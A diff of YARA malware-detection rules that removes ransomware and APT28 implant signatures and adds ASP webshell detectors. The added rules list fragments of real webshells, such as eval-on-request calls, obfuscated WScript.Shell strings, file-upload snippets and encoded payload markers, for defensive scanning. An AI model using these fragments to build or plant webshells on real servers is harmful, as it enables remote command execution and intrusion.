+		$tagasp_short2 = "%>" wide ascii
+		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
+		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
+		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
+		$tagasp_long10 = "<%@ " wide ascii
+		$tagasp_long11 = /<% \w/ nocase wide ascii
+		$tagasp_long12 = "<%ex" nocase wide ascii
+		$tagasp_long13 = "<%ev" nocase wide ascii
+		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
+		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
+		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
+		$php1 = "<?php"
+		$php2 = "<?="
+		$jsp1 = "=\"java." wide ascii
+		$jsp2 = "=\"javax." wide ascii
+		$jsp3 = "java.lang." wide ascii
+		$jsp4 = "public" fullword wide ascii
+		$jsp5 = "throws" fullword wide ascii
+		$jsp6 = "getValue" fullword wide ascii
+		$jsp7 = "getBytes" fullword wide ascii
+		$perl1 = "PerlScript" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 1MB and filesize < 2MB and ( 1 of ( $x* ) or 3 of them ) or 5 of them
+		filesize < 500KB and ( ( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and any of ( $encoded* ) and any of ( $data* ) and ( any of ( $sus* ) or ( filesize < 20KB and #data1 > 4 ) or ( filesize < 700 and #data1 > 0 ) )
 }
-rule SIGNATURE_BASE_MAL_CRIME_RANSOM_Dearcry_Mar21_1 : FILE
+rule SIGNATURE_BASE_WEBSHELL_ASP_Encoded_Aspcoding : FILE
 {
 	meta:
-		description = "Detects DearCry Ransomware affecting Exchange servers"
-		author = "Florian Roth (Nextron Systems)"
-		id = "96cd2fe8-8bb9-5a3b-9bf1-c63a1148a817"
-		date = "2021-03-12"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/phillip_misner/status/1370197696280027136"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_dearcry_ransom.yar#L29-L53"
+		description = "ASP Webshell encoded using ASPEncodeDLL.AspCoding"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "788a8dae-bcb8-547c-ba17-e1f14bc28f34"
+		date = "2021-03-14"
+		modified = "2023-07-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L3781-L3887"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c4af7c29e917078f8658aca68ec95f8a03934f42c81fdd421639437e24f304bc"
-		score = 75
-		quality = 85
+		hash = "7cfd184ab099c4d60b13457140493b49c8ba61ee"
+		hash = "f5095345ee085318235c11ae5869ae564d636a5342868d0935de7582ba3c7d7a"
+		logic_hash = "a0f0b8585b28b13a90c5d112997cacea00af8c89c81eda5edf05508ad41459ab"
+		score = 60
+		quality = -5
 		tags = "FILE"
-		hash1 = "2b9838da7edb0decd32b086e47a31e8f5733b5981ad8247a2f9508e232589bff"
-		hash2 = "e044d9f2d0f1260c3f4a543a1e67f33fcac265be114a1b135fd575b860d2b8c6"
-		hash3 = "feb3e6d30ba573ba23f3bd1291ca173b7879706d1fe039c34d53a4fdcdf33ede"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s1 = "dear!!!" ascii fullword
-		$s2 = "EncryptFile.exe.pdb" ascii fullword
-		$s3 = "/readme.txt" ascii fullword
-		$s4 = "C:\\Users\\john\\" ascii
-		$s5 = "And please send me the following hash!" ascii fullword
-		$op1 = { 68 e0 30 52 00 6a 41 68 a5 00 00 00 6a 22 e8 81 d0 f8 ff 83 c4 14 33 c0 5e }
-		$op2 = { 68 78 6a 50 00 6a 65 6a 74 6a 10 e8 d9 20 fd ff 83 c4 14 33 c0 5e }
-		$op3 = { 31 40 00 13 31 40 00 a4 31 40 00 41 32 40 00 5f 33 40 00 e5 }
+		$encoded1 = "ASPEncodeDLL" fullword nocase wide ascii
+		$encoded2 = ".Runt" nocase wide ascii
+		$encoded3 = "Request" fullword nocase wide ascii
+		$encoded4 = "Response" fullword nocase wide ascii
+		$data1 = "AspCoding.EnCode" wide ascii
+		$tagasp_short1 = /<%[^"]/ wide ascii
+		$tagasp_short2 = "%>" wide ascii
+		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
+		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
+		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
+		$tagasp_long10 = "<%@ " wide ascii
+		$tagasp_long11 = /<% \w/ nocase wide ascii
+		$tagasp_long12 = "<%ex" nocase wide ascii
+		$tagasp_long13 = "<%ev" nocase wide ascii
+		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
+		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
+		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
+		$php1 = "<?php"
+		$php2 = "<?="
+		$jsp1 = "=\"java." wide ascii
+		$jsp2 = "=\"javax." wide ascii
+		$jsp3 = "java.lang." wide ascii
+		$jsp4 = "public" fullword wide ascii
+		$jsp5 = "throws" fullword wide ascii
+		$jsp6 = "getValue" fullword wide ascii
+		$jsp7 = "getBytes" fullword wide ascii
+		$perl1 = "PerlScript" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 4000KB and 3 of them or 5 of them
+		filesize < 500KB and ( ( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and all of ( $encoded* ) and any of ( $data* )
 }
-rule SIGNATURE_BASE_IMPLANT_1_V1 : FILE
+rule SIGNATURE_BASE_WEBSHELL_ASP_By_String : FILE
 {
 	meta:
-		description = "Downrage Implant by APT28"
-		author = "US CERT"
-		id = "eb3fc39b-08ca-51df-a9b4-7b28b107b700"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L12-L26"
+		description = "Known ASP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions."
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "4705b28b-2ffa-53d1-b727-1a9fc2a7dd69"
+		date = "2021-01-13"
+		modified = "2023-04-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L3889-L4067"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4df04daf70da482877874c530a3ad76fddebec2946931b60f98aa6c4e31f21ae"
-		score = 85
-		quality = 85
+		hash = "f72252b13d7ded46f0a206f63a1c19a66449f216"
+		hash = "bd75ac9a1d1f6bcb9a2c82b13ea28c0238360b3a7be909b2ed19d3c96e519d3d"
+		hash = "56a54fe1f8023455800fd0740037d806709ffb9ece1eb9e7486ad3c3e3608d45"
+		hash = "4ef5d8b51f13b36ce7047e373159d7bb42ca6c9da30fad22e083ab19364c9985"
+		hash = "e90c3c270a44575c68d269b6cf78de14222f2cbc5fdfb07b9995eb567d906220"
+		hash = "8a38835f179e71111663b19baade78cc3c9e1f6fcc87eb35009cbd09393cbc53"
+		hash = "f2883e9461393b33feed4139c0fc10fcc72ff92924249eb7be83cb5b76f0f4ee"
+		hash = "10cca59c7112dfb1c9104d352e0504f842efd4e05b228b6f34c2d4e13ffd0eb6"
+		hash = "ed179e5d4d365b0332e9ffca83f66ee0afe1f1b5ac3c656ccd08179170a4d9f7"
+		hash = "ce3273e98e478a7e95fccce0a3d3e8135c234a46f305867f2deacd4f0efa7338"
+		hash = "65543373b8bd7656478fdf9ceeacb8490ff8976b1fefc754cd35c89940225bcf"
+		hash = "de173ea8dcef777368089504a4af0804864295b75e51794038a6d70f2bcfc6f5"
+		logic_hash = "b6ff83bc501753b893a0f5e60c6aafa292617279c0855ce3ba2d0b9b73325e8a"
+		score = 75
+		quality = -41
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$STR1 = {6A ?? E8 ?? ?? FF FF 59 85 C0 74 0B 8B C8 E8 ?? ?? FF FF 8B F0
-         EB 02 33 F6 8B CE E8 ?? ?? FF FF 85 F6 74 0E 8B CE E8 ?? ?? FF FF 56
-         E8 ?? ?? FF FF 59}
+		$asp_string1 = "tseuqer lave" wide ascii
+		$asp_string2 = ":eval request(" wide ascii
+		$asp_string3 = ":eval request(" wide ascii
+		$asp_string4 = "SItEuRl=\"http://www.zjjv.com\"" wide ascii
+		$asp_string5 = "ServerVariables(\"HTTP_HOST\"),\"gov.cn\"" wide ascii
+		$asp_string6 = /e\+.-v\+.-a\+.-l/ wide ascii
+		$asp_string7 = "r+x-e+x-q+x-u" wide ascii
+		$asp_string8 = "add6bb58e139be10" fullword wide ascii
+		$asp_string9 = "WebAdmin2Y.x.y(\"" wide ascii
+		$asp_string10 = "<%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request[" wide ascii
+		$asp_string11 = "<% If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request(" wide ascii
+		$asp_string12 = "UmVxdWVzdC5JdGVtWyJ" wide ascii
+		$asp_string13 = "UAdgBhAGwAKA" wide ascii
+		$asp_string14 = "lAHYAYQBsACgA" wide ascii
+		$asp_string15 = "ZQB2AGEAbAAoA" wide ascii
+		$asp_string16 = "IAZQBxAHUAZQBzAHQAKA" wide ascii
+		$asp_string17 = "yAGUAcQB1AGUAcwB0ACgA" wide ascii
+		$asp_string18 = "cgBlAHEAdQBlAHMAdAAoA" wide ascii
+		$asp_string19 = "\"ev\"&\"al" wide ascii
+		$asp_string20 = "\"Sc\"&\"ri\"&\"p" wide ascii
+		$asp_string21 = "C\"&\"ont\"&\"" wide ascii
+		$asp_string22 = "\"vb\"&\"sc" wide ascii
+		$asp_string23 = "\"A\"&\"do\"&\"d" wide ascii
+		$asp_string24 = "St\"&\"re\"&\"am\"" wide ascii
+		$asp_string25 = "*/eval(" wide ascii
+		$asp_string26 = "\"e\"&\"v\"&\"a\"&\"l" nocase
+		$asp_string27 = "<%eval\"\"&(\"" nocase wide ascii
+		$asp_string28 = "6877656D2B736972786677752B237E232C2A" wide ascii
+		$asp_string29 = "ws\"&\"cript.shell" wide ascii
+		$asp_string30 = "SerVer.CreAtEoBjECT(\"ADODB.Stream\")" wide ascii
+		$asp_string31 = "ASPShell - web based shell" wide ascii
+		$asp_string32 = "<++ CmdAsp.asp ++>" wide ascii
+		$asp_string33 = "\"scr\"&\"ipt\"" wide ascii
+		$asp_string34 = "Regex regImg = new Regex(\"[a-z|A-Z]{1}:\\\\\\\\[a-z|A-Z| |0-9|\\u4e00-\\u9fa5|\\\\~|\\\\\\\\|_|{|}|\\\\.]*\");" wide ascii
+		$asp_string35 = "\"she\"&\"ll." wide ascii
+		$asp_string36 = "LH\"&\"TTP" wide ascii
+		$asp_string37 = "<title>Web Sniffer</title>" wide ascii
+		$asp_string38 = "<title>WebSniff" wide ascii
+		$asp_string39 = "cript\"&\"ing" wide ascii
+		$asp_string40 = "tcejbOmetsySeliF.gnitpircS" wide ascii
+		$asp_string41 = "tcejbOetaerC.revreS" wide ascii
+		$asp_string42 = "This file is part of A Black Path Toward The Sun (\"ABPTTS\")" wide ascii
+		$asp_string43 = "if ((Request.Headers[headerNameKey] != null) && (Request.Headers[headerNameKey].Trim() == headerValueKey.Trim()))" wide ascii
+		$asp_string44 = "if (request.getHeader(headerNameKey).toString().trim().equals(headerValueKey.trim()))" wide ascii
+		$asp_string45 = "Response.Write(Server.HtmlEncode(ExcutemeuCmd(txtArg.Text)));" wide ascii
+		$asp_string46 = "\"c\" + \"m\" + \"d\"" wide ascii
+		$asp_string47 = "\".\"+\"e\"+\"x\"+\"e\"" wide ascii
+		$asp_string48 = "Tas9er" fullword wide ascii
+		$asp_string49 = "<%@ Page Language=\"\\u" wide ascii
+		$asp_string50 = "BinaryRead(\\u" wide ascii
+		$asp_string51 = "Request.\\u" wide ascii
+		$asp_string52 = "System.Buffer.\\u" wide ascii
+		$asp_string53 = "System.Net.\\u" wide ascii
+		$asp_string54 = ".\\u0052\\u0065\\u0066\\u006c\\u0065\\u0063\\u0074\\u0069\\u006f\\u006e\"" wide ascii
+		$asp_string55 = "\\u0041\\u0073\\u0073\\u0065\\u006d\\u0062\\u006c\\u0079.\\u004c\\u006f\\u0061\\u0064" wide ascii
+		$asp_string56 = "\\U00000052\\U00000065\\U00000071\\U00000075\\U00000065\\U00000073\\U00000074[\"" wide ascii
+		$asp_string57 = "*/\\U0000" wide ascii
+		$asp_string58 = "\\U0000FFFA" wide ascii
+		$asp_string59 = "\"e45e329feb5d925b\"" wide ascii
+		$asp_string60 = ">POWER!shelled<" wide ascii
+		$asp_string61 = "@requires xhEditor" wide ascii
+		$tagasp_short1 = /<%[^"]/ wide ascii
+		$tagasp_short2 = "%>" wide ascii
+		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
+		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
+		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
+		$tagasp_long10 = "<%@ " wide ascii
+		$tagasp_long11 = /<% \w/ nocase wide ascii
+		$tagasp_long12 = "<%ex" nocase wide ascii
+		$tagasp_long13 = "<%ev" nocase wide ascii
+		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
+		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
+		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
+		$php1 = "<?php"
+		$php2 = "<?="
+		$jsp1 = "=\"java." wide ascii
+		$jsp2 = "=\"javax." wide ascii
+		$jsp3 = "java.lang." wide ascii
+		$jsp4 = "public" fullword wide ascii
+		$jsp5 = "throws" fullword wide ascii
+		$jsp6 = "getValue" fullword wide ascii
+		$jsp7 = "getBytes" fullword wide ascii
+		$perl1 = "PerlScript" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and all of them
+		filesize < 200KB and ( ( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and any of ( $asp_string* )
 }
-rule SIGNATURE_BASE_IMPLANT_1_V2 : FILE
+rule SIGNATURE_BASE_WEBSHELL_ASP_Sniffer : FILE
 {
 	meta:
-		description = "Downrage Implant by APT28"
-		author = "US CERT"
-		id = "c7beab50-8e73-5161-be7e-bc3f8351873a"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L28-L43"
+		description = "ASP webshell which can sniff local traffic"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "b5704c19-fce1-5210-8185-4839c1c5a344"
+		date = "2021-03-14"
+		modified = "2023-07-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L4069-L4204"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c9bdf38303fadee3e2cfc99b70942a92ab382817a28401e8c8ab8035384c97c1"
-		score = 85
-		quality = 85
+		hash = "1206c22de8d51055a5e3841b4542fb13aa0f97dd"
+		hash = "60d131af1ed23810dbc78f85ee32ffd863f8f0f4"
+		hash = "c3bc4ab8076ef184c526eb7f16e08d41b4cec97e"
+		hash = "ed5938c04f61795834751d44a383f8ca0ceac833"
+		logic_hash = "874ec4c5dff024a899976e46cd553b52c361779a5507cf08ff0de596fd460d41"
+		score = 75
+		quality = -24
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$STR1 = {83 3E 00 53 74 4F 8B 46 04 85 C0 74 48 83 C0 02 50 E8 ?? ?? 00
-         00 8B D8 59 85 DB 74 38 8B 4E 04 83 F9 FF 7E 21 57 }
-		$STR2 = {55 8B EC 8B 45 08 3B 41 08 72 04 32 C0 EB 1B 8B 49 04 8B 04 81
-         80 78 19 01 75 0D FF 70 10 FF [5] 85 C0 74 E3 }
+		$sniff1 = "Socket(" wide ascii
+		$sniff2 = ".Bind(" wide ascii
+		$sniff3 = ".SetSocketOption(" wide ascii
+		$sniff4 = ".IOControl(" wide ascii
+		$sniff5 = "PacketCaptureWriter" fullword wide ascii
+		$tagasp_short1 = /<%[^"]/ wide ascii
+		$tagasp_short2 = "%>" wide ascii
+		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
+		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
+		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
+		$tagasp_long10 = "<%@ " wide ascii
+		$tagasp_long11 = /<% \w/ nocase wide ascii
+		$tagasp_long12 = "<%ex" nocase wide ascii
+		$tagasp_long13 = "<%ev" nocase wide ascii
+		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
+		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
+		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
+		$php1 = "<?php"
+		$php2 = "<?="
+		$jsp1 = "=\"java." wide ascii
+		$jsp2 = "=\"javax." wide ascii
+		$jsp3 = "java.lang." wide ascii
+		$jsp4 = "public" fullword wide ascii
+		$jsp5 = "throws" fullword wide ascii
+		$jsp6 = "getValue" fullword wide ascii
+		$jsp7 = "getBytes" fullword wide ascii
+		$perl1 = "PerlScript" fullword
+		$asp_input1 = "request" fullword nocase wide ascii
+		$asp_input2 = "Page_Load" fullword nocase wide ascii
+		$asp_input3 = "UmVxdWVzdC5Gb3JtK" fullword wide ascii
+		$asp_xml_http = "Microsoft.XMLHTTP" fullword nocase wide ascii
+		$asp_xml_method1 = "GET" fullword wide ascii
+		$asp_xml_method2 = "POST" fullword wide ascii
+		$asp_xml_method3 = "HEAD" fullword wide ascii
+		$asp_form1 = "<form " wide ascii
+		$asp_form2 = "<Form " wide ascii
+		$asp_form3 = "<FORM " wide ascii
+		$asp_asp = "<asp:" wide ascii
+		$asp_text1 = ".text" wide ascii
+		$asp_text2 = ".Text" wide ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and any of them
+		(( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and ( any of ( $asp_input* ) or ( $asp_xml_http and any of ( $asp_xml_method* ) ) or ( any of ( $asp_form* ) and any of ( $asp_text* ) and $asp_asp ) ) and filesize < 30KB and all of ( $sniff* )
 }
-rule SIGNATURE_BASE_IMPLANT_1_V3 : FILE
+rule SIGNATURE_BASE_WEBSHELL_ASP_Generic_Tiny : FILE
 {
 	meta:
-		description = "Downrage Implant by APT28"
-		author = "US CERT"
-		id = "517133d2-813d-5f44-84c2-a53c62d7a688"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L45-L58"
+		description = "Generic tiny ASP webshell which uses any eval/exec function indirectly on user input or writes a file"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "0904cefb-6e0f-5e5f-9986-cf83d409ce46"
+		date = "2021-01-07"
+		modified = "2025-08-18"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L4206-L4415"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e418620b45bc11804eae24db3cba8421758c214fc9f660a17761bbf3395ad744"
-		score = 85
-		quality = 85
+		hash = "990e3f129b8ba409a819705276f8fa845b95dad0"
+		hash = "52ce724580e533da983856c4ebe634336f5fd13a"
+		hash = "0864f040a37c3e1cef0213df273870ed6a61e4bc"
+		hash = "b184dc97b19485f734e3057e67007a16d47b2a62"
+		logic_hash = "e1b4e9fa88bb4260a83a22ec73c9fbec4d4f4928965cba9dfdd6fdba1307e8e4"
+		score = 75
+		quality = -102
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$rol7encode = { 0F B7 C9 C1 C0 07 83 C2 02 33 C1 0F B7 0A 47 66 85 C9 75 }
+		$fp1 = "net.rim.application.ipproxyservice.AdminCommand.execute"
+		$tagasp_short1 = /<%[^"]/ wide ascii
+		$tagasp_short2 = "%>" wide ascii
+		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
+		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
+		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
+		$tagasp_long10 = "<%@ " wide ascii
+		$tagasp_long11 = /<% \w/ nocase wide ascii
+		$tagasp_long12 = "<%ex" nocase wide ascii
+		$tagasp_long13 = "<%ev" nocase wide ascii
+		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
+		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
+		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
+		$php1 = "<?php"
+		$php2 = "<?="
+		$jsp1 = "=\"java." wide ascii
+		$jsp2 = "=\"javax." wide ascii
+		$jsp3 = "java.lang." wide ascii
+		$jsp4 = "public" fullword wide ascii
+		$jsp5 = "throws" fullword wide ascii
+		$jsp6 = "getValue" fullword wide ascii
+		$jsp7 = "getBytes" fullword wide ascii
+		$perl1 = "PerlScript" fullword
+		$asp_input1 = "request" fullword nocase wide ascii
+		$asp_input2 = "Page_Load" fullword nocase wide ascii
+		$asp_input3 = "UmVxdWVzdC5Gb3JtK" fullword wide ascii
+		$asp_xml_http = "Microsoft.XMLHTTP" fullword nocase wide ascii
+		$asp_xml_method1 = "GET" fullword wide ascii
+		$asp_xml_method2 = "POST" fullword wide ascii
+		$asp_xml_method3 = "HEAD" fullword wide ascii
+		$asp_form1 = "<form " wide ascii
+		$asp_form2 = "<Form " wide ascii
+		$asp_form3 = "<FORM " wide ascii
+		$asp_asp = "<asp:" wide ascii
+		$asp_text1 = ".text" wide ascii
+		$asp_text2 = ".Text" wide ascii
+		$dex1 = "dex\n0"
+		$dex2 = "dey\n0"
+		$pack = { 50 41 43 4b 00 00 00 02 00 }
+		$asp_payload0 = "eval_r" fullword nocase wide ascii
+		$asp_payload1 = /\beval\s/ nocase wide ascii
+		$asp_payload2 = /\beval\(/ nocase wide ascii
+		$asp_payload3 = /\beval\"\"/ nocase wide ascii
+		$asp_payload4 = /:\s{0,10}eval\b/ nocase wide ascii
+		$asp_payload8 = /\bexecute\s?\(/ nocase wide ascii
+		$asp_payload9 = /\bexecute\s[\w"]/ nocase wide ascii
+		$asp_payload11 = "WSCRIPT.SHELL" fullword nocase wide ascii
+		$asp_payload13 = "ExecuteGlobal" fullword nocase wide ascii
+		$asp_payload14 = "ExecuteStatement" fullword nocase wide ascii
+		$asp_payload15 = "ExecuteStatement" fullword nocase wide ascii
+		$asp_multi_payload_one1 = "CreateObject" nocase fullword wide ascii
+		$asp_multi_payload_one2 = "addcode" fullword wide ascii
+		$asp_multi_payload_one3 = /\.run\b/ wide ascii
+		$asp_multi_payload_two1 = "CreateInstanceFromVirtualPath" fullword wide ascii
+		$asp_multi_payload_two2 = "ProcessRequest" fullword wide ascii
+		$asp_multi_payload_two3 = "BuildManager" fullword wide ascii
+		$asp_multi_payload_three1 = "System.Diagnostics" wide ascii
+		$asp_multi_payload_three2 = "Process" fullword wide ascii
+		$asp_multi_payload_three3 = ".Start" wide ascii
+		$asp_multi_payload_four1 = "CreateObject" fullword nocase wide ascii
+		$asp_multi_payload_four2 = "TransformNode" fullword nocase wide ascii
+		$asp_multi_payload_four3 = "loadxml" fullword nocase wide ascii
+		$asp_multi_payload_five1 = "ProcessStartInfo" fullword nocase wide ascii
+		$asp_multi_payload_five2 = ".Start" nocase wide ascii
+		$asp_multi_payload_five3 = ".Filename" nocase wide ascii
+		$asp_multi_payload_five4 = ".Arguments" nocase wide ascii
+		$asp_always_write1 = /\.write/ nocase wide ascii
+		$asp_always_write2 = /\.swrite/ nocase wide ascii
+		$asp_write_way_one2 = "SaveToFile" fullword nocase wide ascii
+		$asp_write_way_one3 = "CREAtEtExtFiLE" fullword nocase wide ascii
+		$asp_cr_write1 = "CreateObject(" nocase wide ascii
+		$asp_cr_write2 = "CreateObject (" nocase wide ascii
+		$asp_streamwriter1 = "streamwriter" fullword nocase wide ascii
+		$asp_streamwriter2 = "filestream" fullword nocase wide ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
